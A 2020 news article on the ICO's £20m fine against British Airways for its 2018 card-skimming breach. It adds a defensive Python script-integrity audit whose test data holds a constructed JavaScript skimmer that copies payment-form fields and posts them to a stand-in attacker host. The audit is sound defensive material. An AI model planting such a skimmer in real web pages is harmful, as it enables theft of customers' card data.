ICO fines British Airways £20m for 2018 data breach

The Information Commissioner's Office (ICO) has fined British Airways £20 million for failing to prevent a 2018 cyber attack that compromised the personal data of 429,612 customers and staff, including the names, addresses, payment card numbers and CVV numbers of 244,000 BA customers.

The £20 million fine is a fraction of the £183.39 million that the ICO initially intended to levy on British Airways. The ICO said the final amount was arrived at after taking into account the economic impact of COVID-19 on British Airways' business as well as the airline's representations.

The incident behind the fine involved attackers using 22 lines of script to modify a large number of scripts on the British Airways website, then using those modified scripts to capture the details customers entered into payment forms and send them to a server under the attackers' control.

The attackers planted data-skimming code on the British Airways website and, between 21 August and 5 September 2018, exfiltrated the names, addresses, payment card numbers and CVV numbers of 244,000 BA customers. They also stole the usernames and passwords of BA employee and administrator accounts, as well as the usernames and PINs of up to 612 BA Executive Club accounts.

According to the ICO, British Airways could have prevented the breach of customer and staff data by limiting access to applications, data and tools; by undertaking rigorous testing of the business's systems, in the form of a simulated cyber attack; and by protecting employee and third-party accounts with multi-factor authentication.

The ICO noted that British Airways did not detect the data exfiltration from its website for more than two months after the attack began on 22 June 2018. It was only after a third party alerted the airline to the attack that it acted promptly and notified the ICO.
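The attack described above turned on two things a defender can check for: site scripts whose content no longer matches what was deployed, and scripts that send data to hosts the site never talks to. The following is an added example written for this article, not code from the ICO notice or from British Airways. It builds a SHA-256 baseline of a site's scripts, compares a later snapshot against it, and lists any unknown outbound hosts in the scripts that changed. All paths, hostnames and script contents are constructed for the example; the appended skimmer fragment simply reads a payment form on submit and posts it elsewhere, which is the behaviour the article describes.

```python
"""Script-integrity and exfiltration-host audit for a site's JavaScript.

Added example, not code from the ICO notice or from British Airways.
Every path, hostname and script body here is constructed for illustration.
"""
import hashlib
import re
from urllib.parse import urlparse

# Constructed known-good scripts as deployed (hypothetical paths and contents).
DEPLOYED_SCRIPTS = {
    "/js/vendor/ui-lib.js": "window.UiLib = {touch: true};\n",
    "/js/checkout.js": (
        "document.getElementById('pay').onsubmit = function () {\n"
        "  fetch('https://www.example-airline.test/api/pay', {method: 'POST'});\n"
        "};\n"
    ),
}

# Constructed snapshot of the same paths after an attacker has appended a
# form-skimming hook to one script: on submit it copies every field of the
# payment form and posts the copy to an attacker-controlled host.
CURRENT_SCRIPTS = dict(DEPLOYED_SCRIPTS)
CURRENT_SCRIPTS["/js/vendor/ui-lib.js"] += (
    "document.getElementById('pay').addEventListener('submit', function () {\n"
    "  var d = {}; var f = document.forms[0];\n"
    "  for (var i = 0; i < f.elements.length; i++) d[f.elements[i].name] = f.elements[i].value;\n"
    "  fetch('https://skimmer.example.invalid/collect', {method: 'POST', body: JSON.stringify(d)});\n"
    "});\n"
)

# Hosts the site's own scripts are allowed to contact (constructed allowlist).
ALLOWED_HOSTS = {"www.example-airline.test"}

# Absolute http(s) URLs embedded in script source; stops at quotes and whitespace.
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(scripts):
    """Record a SHA-256 per script path; run this against the known-good build."""
    return {path: sha256_hex(body) for path, body in scripts.items()}


def find_modified(baseline, current):
    """Paths whose content differs from the baseline, plus paths the baseline
    never had. Paths that disappeared are not reported here."""
    changed = [path for path, body in current.items()
               if baseline.get(path) != sha256_hex(body)]
    return sorted(changed)


def foreign_hosts(script_body, allowed):
    """Hostnames the script contacts that are not on the allowlist."""
    hosts = {urlparse(url).hostname for url in URL_RE.findall(script_body)}
    return sorted(host for host in hosts if host and host not in allowed)


def audit(baseline, current, allowed):
    """Map each modified script to the unknown hosts it reaches. A modified
    script that also contacts a foreign host is the strongest skimmer signal."""
    return {path: foreign_hosts(current[path], allowed)
            for path in find_modified(baseline, current)}


if __name__ == "__main__":
    baseline = build_baseline(DEPLOYED_SCRIPTS)
    for path, hosts in audit(baseline, CURRENT_SCRIPTS, ALLOWED_HOSTS).items():
        print(f"MODIFIED {path}; unknown outbound hosts: {hosts or 'none'}")
```

In practice the baseline is taken from the build artefact and the snapshot from what the CDN or origin actually serves to a browser, on a schedule measured in hours rather than months. The check is complementary to, not a substitute for, Subresource Integrity on script tags and a Content-Security-Policy whose connect-src and form-action directives name only the hosts the site legitimately uses.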

"It is not clear whether or when BA would have identified the attack themselves. This was considered to be a severe failing because of the number of people affected and because any potential financial harm could have been more significant," ICO said.

“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure. Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date,” said Information Commissioner Elizabeth Denham.

“When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security,” she added.

According to ICO, the breach suffered by British Airways compromised the following information:

  • Personal data of approximately 429,612 customers and staff, including names, addresses, payment card numbers, and CVV numbers of 244,000 BA customers.
  • Combined card and CVV numbers of 77,000 customers and card numbers only for 108,000 customers.
  • Usernames and passwords of BA employee and administrator accounts as well as usernames and PINs of up to 612 BA Executive Club accounts.

Commenting on the fine issued by the ICO, Stuart Reed, UK Director at Orange Cyberdefense, said that while the size of the fine may be smaller than many people expected, the damage to customer trust could have an even bigger impact on the airline than the financial cost. The ICO's finding that the airline was processing a significant amount of personal data without adequate security measures in place is particularly damning.

“Organisations are expected to demonstrate best security practice at all times. It is imperative that they recognise that the onus is on them to make sure they have done everything they can to protect customer data. Otherwise, the consequences can be complex and extremely costly.

“Firms must adopt a layered security approach that includes people, process, and enabling technologies to reduce the risk, minimise the impact of a breach should one occur, and demonstrate diligence and best practice to both customers and governing bodies,” he added.

Copyright Lyonsdown Limited 2020